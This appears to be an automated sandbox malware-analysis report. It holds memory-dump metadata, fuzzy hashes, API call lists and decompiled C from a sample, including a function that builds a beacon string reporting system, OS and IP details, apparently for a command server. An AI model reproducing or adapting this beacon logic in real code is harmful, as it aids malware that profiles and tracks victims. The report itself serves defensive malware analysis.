0x02e9850a
0x02e98516
0x02e9851d
0x02e98523
0x02e98523
0x02e98524
0x02e98526
0x02e98529
0x02e9852c
0x02e98532
0x02e9853a
0x02e9853d
0x02e98540
0x02e98543
0x02e98549
0x02e98553
0x02e98556
0x02e9855c
0x02e98568
0x02e9856f
0x02e98576
0x02e98576
0x02e98577
0x02e98578
0x02e98580
0x02e98583
0x02e98586
0x02e9858c
0x02e9858f
0x02e98596
0x02e985a1
0x02e985a5
0x02e985a6
0x02e985ac
0x02e985b4
0x02e985bb
0x02e985c4
0x02e985c5
0x02e985c6
0x02e985c6
0x02e98580
0x02e985c7
0x02e985c8
0x02e985cc
0x02e985cf
0x02e985d3
0x02e985d6
0x02e985e0
0x02e985e5
0x02e985ef
0x02e985f2
0x02e985fa
0x02e98601
0x02e98608
0x02e98608
0x02e98609
0x02e9860c
0x02e9860f
0x02e9861c
0x02e9861f
0x02e98623
0x02e98626
0x02e98632
0x02e98639
0x02e9863f
0x02e98640
0x02e98640
0x02e98642
0x02e98645
0x02e98648
0x02e98655
0x02e98658
0x02e9865c
0x02e98667
0x02e9866b
0x02e9866c
0x02e98672
0x02e98679
0x02e9867f
0x02e98682
0x02e98682
0x02e98683
0x02e98684
0x02e98687
0x02e9868a
0x02e98697
0x02e98699
0x02e986a3
0x02e986a6
0x02e986ac
0x02e986b3
0x02e986b9
0x02e986bc
0x02e986bc
0x02e986bd
0x02e986c0
0x02e986ca
0x02e986cc
0x02e986d3
0x02e986d7
0x02e986da
0x02e986e0
0x02e986ec
0x02e986f3
0x02e986f9
0x02e986f9
0x02e986fa
0x02e98707
0x02e98709
0x02e98713
0x02e98716
0x02e98722
0x02e98729
0x02e9872f
0x02e98730
0x02e98730
0x02e98731
0x02e98732
0x02e9873b
0x02e9873e
0x02e98742
0x02e98748
0x02e9874b
0x02e98751
0x02e98758
0x02e9875e
0x02e98761
0x02e98761
0x02e98768
0x02e9876b
0x02e9876e
0x02e98771
0x02e9877e
0x02e98780
0x02e9878c
0x02e98793
0x02e98799
0x02e98799
0x02e9879a
0x02e987a7
0x02e987aa
0x02e987ae
0x02e987b1
0x02e987b7
0x02e987bf
0x02e987c6
0x02e987cc
0x02e987cf
0x02e987cf
0x02e987d0
0x02e987d3
0x02e987d6
0x02e987e3
0x02e987e6
0x02e987ea
0x02e987f5
0x02e987f9
0x02e987fc
0x02e98804
0x02e9880b
0x02e98811
0x02e98812
0x02e98812
0x02e98813
0x02e98814
0x02e98818
0x02e98822
0x02e9882b
0x02e9882b
0x02e9882e
0x02e9883a
0x02e98841
0x02e98847
0x02e98847
0x02e98848
0x02e9884e
0x02e98856
0x02e9885d
0x02e98863
0x02e9886f
0x02e98879
0x02e9887c
0x02e9887f
0x02e98885
0x02e9888d
0x02e98894
0x02e9889a
0x02e9889d
0x02e988a5
0x02e988a8
0x02e988ac
0x02e988b0
0x02e988b6
0x02e988bd
0x02e988c3
0x02e988c6
0x02e988c6
0x02e988c7
0x02e988c8
0x02e988cf
0x02e988d2
0x02e988dc
0x02e988df
0x02e988e2
0x02e988ec
0x02e988ef
0x02e988f5
0x02e988fc
0x02e98902
0x02e98905
0x02e98905
0x02e9890d
0x02e9891a
0x02e9891d
0x02e98921
0x02e9892c
0x02e98930
0x02e98933
0x02e9893f
0x02e98946
0x02e9894c
0x02e9894d
0x02e9894d
0x02e9894e
0x02e98951
0x02e9895b
0x02e9895e
0x02e98965
0x02e98969
0x02e98977
0x02e98977
0x02e98982
0x02e98986
0x02e9898f
0x02e98993
0x02e9899b
0x02e9899b
0x02e989a6
0x02e989b1
0x02e989b2
0x02e989b5
0x02e989b8
0x02e989b8
0x02e989be
0x02e989cb
0x02e989cd
0x02e989d4
0x02e989de
0x02e989de
0x02e989e1
0x02e989e7
0x02e989ef
0x02e989f6
0x02e989fc
0x02e989ff
0x02e989ff
0x02e98a00
0x02e98a08
0x02e98a0f
0x02e98a15
0x02e98a18
0x02e98a20
0x02e98a23
0x02e98a26
0x02e98a29
0x02e98a31
0x02e98a38
0x02e98a3e
0x02e98a3f
0x02e98a3f
0x02e98a20
0x02e98a40
0x02e98a47
0x02e98a51
0x02e98a55
0x02e98a5f
0x02e98a62
0x02e98a65
0x02e98a6d
0x02e98a74
0x02e98a7a
0x02e98a82
0x02e98a8f
0x02e98a91
0x02e98a97
0x02e98a9f
0x02e98aa6
0x02e98aac
0x02e98aac
0x02e98aaf
0x02e98abc
0x02e98abf
0x02e98ac3
0x02e98ac7
0x02e98aca
0x02e98acd
0x02e98ad3
0x02e98adb
0x02e98ae2
0x02e98ae8
0x02e98aeb
0x02e98aeb
0x02e98af2
0x02e98af9
0x02e98aff
0x02e98b07
0x02e98b11
0x02e98b15
0x02e98b16
0x02e98b1e
0x02e98b25
0x02e98b2b
0x02e98b2b
0x02e98b07
0x02e98b2c
0x02e98b34
0x02e98b38
0x02e98b40
0x02e98b4d
0x02e98b4f
0x02e98b57
0x02e98b5b
0x02e98b5c
0x02e98b5d
0x02e98b64
0x02e98b67
0x02e98b68
0x02e98b6f
0x02e98b70
0x02e98b74
0x02e98b77
0x02e98b7e
0x02e98b81
0x02e98b88
0x02e98b8b
0x02e98b8c
0x02e98b93
0x02e98b97
0x02e98b98
0x02e98ba0
0x02e98ba7
0x02e98bad
0x02e98bad
0x02e98bae
0x02e98bb5
0x02e98bb5
0x02e98bbf
0x02e98bc1
0x02e98bc7
0x02e98bcf
0x02e98bd6
0x02e98bdc
0x02e98bdc
0x02e98bdf
0x02e98bec
0x02e98bee
0x02e98bf5
0x02e98bf8
0x02e98c00
0x02e98c07
0x02e98c0d
0x02e98c0e
0x02e98c0e
0x02e98c0f
0x02e98c17
0x02e98c1e
0x02e98c24
0x02e98c24
0x02e98c27
0x02e98c2e
0x02e98c2e
0x02e98c38
0x02e98c3a
0x02e98c40
0x02e98c48
0x02e98c4f
0x02e98c55
0x02e98c55
0x02e98c58
0x02e98c5e
0x02e98c5f
0x02e98c62
0x02e98c6c
0x02e98c6e
0x02e98c7a
0x02e98c81
0x02e98c87
0x02e98c87
0x02e98c8e
0x02e98c91
0x02e98c9b
0x02e98c9d
0x02e98ca3
0x02e98cab
0x02e98cb2
0x02e98cb8
0x02e98cb8
0x02e98cbb
0x02e98cc8
0x02e98cca
0x02e98cd4
0x02e98cdf
0x02e98ce3
0x02e98ce4
0x02e98cf0
0x02e98cf7
0x02e98cfd
0x02e98cfe
0x02e98cfe
0x02e98cff
0x02e98d02
0x02e98d0c
0x02e98d16
0x02e98d1b
0x02e98d21
0x02e98d29
0x02e98d30
0x02e98d36
0x02e98d36
0x02e98d39
0x02e98d46
0x02e98d48
0x02e98d52
0x02e98d56
0x02e98d5f
0x02e98d65
0x02e98d6c
0x02e98d72
0x02e98d75
0x02e98d75
0x02e98d76
0x02e98d7e
0x02e98d85
0x02e98d8b
0x02e98d8e
0x02e98d8f
0x02e98d97
0x02e98d9e
0x02e98da4
0x02e98dae
0x02e98db0
0x02e98db9
0x02e98dbc
0x02e98dc2
0x02e98dc8
0x02e98dcf
0x02e98dd5
0x02e98dd8
0x02e98dd9
0x02e98de1
0x02e98de6
0x02e98de9
0x02e98df0
0x02e98df3
0x02e98dff
0x02e98e06
0x02e98e0c
0x02e98e0d
0x02e98e0e
0x02e98e0e
0x02e98e0f
0x02e98e17
0x02e98e19
0x02e98e20
0x02e98e24
0x02e98e28
0x02e98e2c
0x02e98e2f
0x02e98e39
0x02e98e42
0x02e98e43
0x02e98e46
0x02e98e49
0x02e98e4f
0x02e98e50
0x02e98e51
0x02e98e17
0x02e98e52
0x02e98e59
0x02e98e5c
0x02e98e5f
0x02e98e67
0x02e98e69
0x02e98e73
0x02e98e7d
0x02e98e80
0x02e98e88
0x02e98e8f
0x02e98e95
0x02e98e96
0x02e98e96
0x02e98e97
0x02e98e9e
0x02e98ea1
0x02e98ea4
0x02e98eb1
0x02e98eb4
0x02e98eb8
0x02e98ebc
0x02e98ec3
0x02e98ec9
0x02e98ed1
0x02e98ed8
0x02e98ede
0x02e98ee1
0x02e98ee1
0x02e98ee3
0x02e98ee6
0x02e98ee9
0x02e98eef
0x02e98ef6
0x02e98f00
0x02e98f04
0x02e98f07
0x02e98f0d
0x02e98f0e
0x02e98f10
0x02e98f1f
0x02e98f26
0x02e98f2e
0x02e98f38
0x02e98f42
0x02e98f45
0x02e98f48
0x02e98f54
0x02e98f5b
0x02e98f61
0x02e98f61
0x02e98f62
0x02e98f64
0x02e98f6c
0x02e98f73
0x02e98f76
0x02e98f80
0x02e98f89
0x02e98f90
0x02e98f9c
0x02e98f9f
0x02e98fa5
0x02e98fac
0x02e98fb2
0x02e98fb5
0x02e98fb6
0x02e98fbd
0x02e98fc0
0x02e98fca
0x02e98fd4
0x02e98fd8
0x02e98fd9
0x02e98fe1
0x02e98fe8
0x02e98fee
0x02e98fee
0x02e98fef
0x02e98ff8
0x02e98ffb
0x02e99001
0x02e99009
0x02e99010
0x02e99016
0x02e99016
0x02e99019
0x02e99019
0x02e98151
0x02e99028
0x02e9902a
0x02e99032
0x02e9903c
0x02e99040
0x02e99049
0x02e9904d
0x02e99056
0x02e9905a
0x02e99062
0x02e99062
0x02e9906d
0x02e99071
0x02e99079
0x02e99079
0x02e99084
0x02e99088
0x02e99089
0x02e9908f
0x02e99097
0x02e9909e
0x02e990a4
0x02e990a4
0x02e990a7
0x02e990af
0x02e990b6
0x02e990bc
0x02e990c6
0x02e990d0
0x02e990d5
0x02e990db
0x02e990e3
0x02e990ea
0x02e990f0
0x02e990f0
0x02e990f6
0x02e990ff
0x02e99108
0x02e9910b
0x02e9910e
0x02e9910e
0x02e99114
0x02e9911a
0x02e99127
0x02e9912b
0x02e99137
0x02e9913a
0x02e99140
0x02e99148
0x02e9914f
0x02e99155
0x02e99155
0x02e99165
0x02e99167
0x02e9916f
0x02e99171
0x02e9917d
0x02e99184
0x02e9918a
0x02e9918a
0x02e9918b
0x02e9919a
0x02e9919c
0x02e9919f
0x02e991a7
0x02e991ac
0x02e991b0
0x02e991b4
0x02e991b9
0x02e991c5
0x02e991cc
0x02e991d2
0x02e991d3
0x02e991d3
0x02e991d4
0x02e991d4
0x02e991d4
0x02e991dd
0x02e991e2
0x02e991e5
0x02e991eb
0x02e991f3
0x02e991fa
0x02e99200
0x02e99204
0x02e9920b
0x02e9920c
0x02e9921b
0x02e9921d
0x02e99227
0x02e99229
0x02e99230
0x02e99234
0x02e99238
0x02e9923b
0x02e99241
0x02e99248
0x02e9924e
0x02e99251
0x02e99252
0x02e99252
0x02e99254
0x02e9925b
0x02e9925e
0x02e9926b
0x02e9926d
0x02e99274
0x02e99278
0x02e9927b
0x02e9927e
0x02e99288
0x02e9928b
0x02e99293
0x02e9929a
0x02e992a0
0x02e992a1
0x02e992a2
0x02e992a2
0x02e992a3
0x02e992a9
0x02e992b6
0x02e992b9
0x02e992bd
0x02e992c8
0x02e992cd
0x02e992d3
0x02e992db
0x02e992e2
0x02e992e8
0x02e992eb

Memory Dump Source

Source File: 00000001.00000002.812924530.0000000002E90000.00000040.00000001.sdmp, Offset: 02E90000, based on PE: true

Associated: 00000001.00000002.812973366.0000000002EAC000.00000040.00000001.sdmp Download File
Associated: 00000001.00000002.813008931.0000000002ED7000.00000040.00000001.sdmp Download File
Associated: 00000001.00000002.813063864.0000000003520000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599c109a36e8089753ff55c91b4416c9c471d6ab3a9c41a2ab697426dcca743a
Instruction ID: cc722c474767c0f740461c0e5374dd0a3bc664967314286fe07952b7858ec856
Opcode Fuzzy Hash: 599c109a36e8089753ff55c91b4416c9c471d6ab3a9c41a2ab697426dcca743a
Instruction Fuzzy Hash: 7DA16FB2D44204EFEF049F60C9897AEBBF5FF84325F1981AEDC889A149C7781550CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00F97FA8, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00F97FA8(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00F98113(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00F981CD(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00F980B8(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00F98113(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00F981AF(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00f97fac
0x00f97fad
0x00f97fae
0x00f97fb1
0x00f97fb3
0x00f97fb6
0x00f97fb7
0x00f97fb9
0x00f97fba
0x00f97fbb
0x00f97fbe
0x00f97fc8
0x00f98079
0x00f98080
0x00f98089
0x00f97fce
0x00f97fce
0x00f97fd4
0x00f97fda
0x00f97fdd
0x00f97fe0
0x00f97fe4
0x00f97fe9
0x00f97fee
0x00f9806e
0x00000000
0x00f97ff0
0x00f97ff0
0x00f97ffc
0x00f97ffe
0x00f98059
0x00f98059
0x00f9805f
0x00000000
0x00f98000
0x00f9800f
0x00f98011
0x00f98012
0x00f98013
0x00f98016
0x00f98016
0x00f98018
0x00000000
0x00f9801a
0x00f9801a
0x00f98064
0x00f9801c
0x00f9801c
0x00f98020
0x00f98028
0x00f9802d
0x00f98032
0x00f9803e
0x00f98046
0x00f9804d
0x00f98053
0x00f98057
0x00000000
0x00f98057
0x00f9801a
0x00f98018
0x00000000
0x00f97ffe
0x00f98072
0x00f98072
0x00f98072
0x00f97fee
0x00f9808e
0x00f98095

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 7ccdaed9b71f69d683be9843002fa0beba051a7315324eccc6c2151b3341c9ae
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: C421D6729002049FDF10EF69CC8196BBBA5FF453A0B058569E91A8B255DB30F91AD7E0

Uniqueness

Uniqueness Score: -1.00%

Function 10002264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E10002264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E100023CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E10002485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E10002370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E100023CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E10002467(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x10002268
0x10002269
0x1000226a
0x1000226d
0x1000226f
0x10002272
0x10002273
0x10002275
0x10002276
0x10002277
0x1000227a
0x10002284
0x10002335
0x1000233c
0x10002345
0x1000228a
0x1000228a
0x10002290
0x10002296
0x10002299
0x1000229c
0x100022a0
0x100022a5
0x100022aa
0x1000232a
0x00000000
0x100022ac
0x100022ac
0x100022b8
0x100022ba
0x10002315
0x10002315
0x1000231b
0x00000000
0x100022bc
0x100022cb
0x100022cd
0x100022ce
0x100022cf
0x100022d2
0x100022d2
0x100022d4
0x00000000
0x100022d6
0x100022d6
0x10002320
0x100022d8
0x100022d8
0x100022dc
0x100022e4
0x100022e9
0x100022ee
0x100022fa
0x10002302
0x10002309
0x1000230f
0x10002313
0x00000000
0x10002313
0x100022d6
0x100022d4
0x00000000
0x100022ba
0x1000232e
0x1000232e
0x1000232e
0x100022aa
0x1000234a
0x10002351

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 59baae27993e46d7603178674c38140bc715badc64f02de8c9ae09fa5cb3f5c8
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: B421C876900204DFDB10DF68C8C18ABF7A5FF49390B468168ED159B24ADB34FA15C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00F96124, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00F96124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xf9a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xf9a018; // 0xa6c26295
					asm("bswap eax");
					_t32 =  *0xf9a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xf9a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xf9a00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0xf9a2d0; // 0x310d5a8
					_t2 = _t35 + 0xf9b622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0xf9a02c,  *0xf9a004, _t110);
					_t38 = E00F9271A();
					_t39 =  *0xf9a2d0; // 0x310d5a8
					_t3 = _t39 + 0xf9b662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xf9a2d0; // 0x310d5a8
						_t7 = _t92 + 0xf9b66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00F92956(_t99);
					_t44 =  *0xf9a2d0; // 0x310d5a8
					_t9 = _t44 + 0xf9b38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xf9a2d0; // 0x310d5a8
					_t11 = _t48 + 0xf9b33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xf9a328; // 0x40a95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xf9a2d0; // 0x310d5a8
						_t13 = _t88 + 0xf9b685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xf9a37c; // 0x40a9630
					_a28 = E00F95741(0xf9a00a, _t105 + 4);
					_t55 =  *0xf9a318; // 0x40a95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xf9a2d0; // 0x310d5a8
						_t16 = _t84 + 0xf9b8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xf9a314; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xf9a2d0; // 0x310d5a8
						_t18 = _t81 + 0xf9b8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xf9a290, _t107, 0x800);
						if(_t98 != _t107) {
							E00F91A51(GetTickCount());
							_t62 =  *0xf9a37c; // 0x40a9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xf9a37c; // 0x40a9630
							__imp__(_t66 + 0x40);
							_t68 =  *0xf9a37c; // 0x40a9630
							_t115 = E00F95AE3(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0xf992cc);
								_push(_t115);
								_t108 = E00F92829();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00F93B46(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00F92813();
									}
									HeapFree( *0xf9a290, 0, _v24);
								}
								HeapFree( *0xf9a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0xf9a290, _t107, _t98);
						}
						HeapFree( *0xf9a290, _t107, _a20);
					}
					HeapFree( *0xf9a290, _t107, _t117);
				}
				return _v16;
			}

0x00f96124
0x00f96138
0x00f9613a
0x00f96148
0x00f9614c
0x00f96154
0x00f9615c
0x00f9615c
0x00f9615e
0x00f9616a
0x00f96179
0x00f9617e
0x00f96181
0x00f96186
0x00f96189
0x00f9618e
0x00f96191
0x00f9619d
0x00f961aa
0x00f961ac
0x00f961b2
0x00f961b7
0x00f961c2
0x00f961c4
0x00f961c7
0x00f961cd
0x00f961cf
0x00f961d8
0x00f961e3
0x00f961e5
0x00f961e8
0x00f961e8
0x00f961ea
0x00f961f1
0x00f961f6
0x00f96203
0x00f96205
0x00f9620a
0x00f96218
0x00f9621a
0x00f9621f
0x00f96224
0x00f96227
0x00f9622c
0x00f96237
0x00f96239
0x00f9623c
0x00f9623c
0x00f9623e
0x00f96251
0x00f96255
0x00f9625a
0x00f9625e
0x00f96261
0x00f96266
0x00f96271
0x00f96273
0x00f96276
0x00f96276
0x00f96278
0x00f9627f
0x00f96282
0x00f96287
0x00f96291
0x00f96293
0x00f9629a
0x00f962b2
0x00f962b6
0x00f962c2
0x00f962c7
0x00f962d0
0x00f962e1
0x00f962e5
0x00f962ee
0x00f962f4
0x00f96301
0x00f9630e
0x00f96314
0x00f9631c
0x00f96322
0x00f96328
0x00f9632c
0x00f96330
0x00f96336
0x00f9633a
0x00f96341
0x00f96348
0x00f9634c
0x00f96357
0x00f9635e
0x00f96362
0x00f9636b
0x00f9636b
0x00f9637c
0x00f9637c
0x00f9638b
0x00f96391
0x00f96391
0x00f9639b
0x00f9639b
0x00f963ac
0x00f963ac
0x00f963ba
0x00f963ba
0x00f963ca

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00F96142
GetTickCount.KERNEL32 ref: 00F96156
wsprintfA.USER32 ref: 00F961A5
wsprintfA.USER32 ref: 00F961C2
wsprintfA.USER32 ref: 00F961E3
wsprintfA.USER32 ref: 00F96201
wsprintfA.USER32 ref: 00F96216
wsprintfA.USER32 ref: 00F96237
wsprintfA.USER32 ref: 00F96271
wsprintfA.USER32 ref: 00F96291
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F962AC
GetTickCount.KERNEL32 ref: 00F962BC
RtlEnterCriticalSection.NTDLL(040A95F0), ref: 00F962D0
RtlLeaveCriticalSection.NTDLL(040A95F0), ref: 00F962EE

Part of subcall function 00F95AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00F96301,00000000,040A9630), ref: 00F95B0E
Part of subcall function 00F95AE3: lstrlen.KERNEL32(00000000,?,00000000,00F96301,00000000,040A9630), ref: 00F95B16
Part of subcall function 00F95AE3: strcpy.NTDLL ref: 00F95B2D
Part of subcall function 00F95AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00F95B38
Part of subcall function 00F95AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00F96301,?,00000000,00F96301,00000000,040A9630), ref: 00F95B55

StrTrimA.SHLWAPI(00000000,00F992CC,00000000,040A9630), ref: 00F9631C

Part of subcall function 00F92829: lstrlen.KERNEL32(040A887A,00000000,00000000,00000000,00F96328,00000000), ref: 00F92839
Part of subcall function 00F92829: lstrlen.KERNEL32(?), ref: 00F92841
Part of subcall function 00F92829: lstrcpy.KERNEL32(00000000,040A887A), ref: 00F92855
Part of subcall function 00F92829: lstrcat.KERNEL32(00000000,?), ref: 00F92860

lstrcpy.KERNEL32(00000000,?), ref: 00F9633A
lstrcat.KERNEL32(00000000,00000000), ref: 00F96348
lstrcat.KERNEL32(00000000,00000000), ref: 00F9634C
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00F9637C
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00F9638B
HeapFree.KERNEL32(00000000,00000000,00000000,040A9630), ref: 00F9639B
HeapFree.KERNEL32(00000000,?), ref: 00F963AC
HeapFree.KERNEL32(00000000,00000000), ref: 00F963BA

Strings

Ut, xrefs: 00F9637C, 00F9638B, 00F9639B, 00F963AC, 00F963BA

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
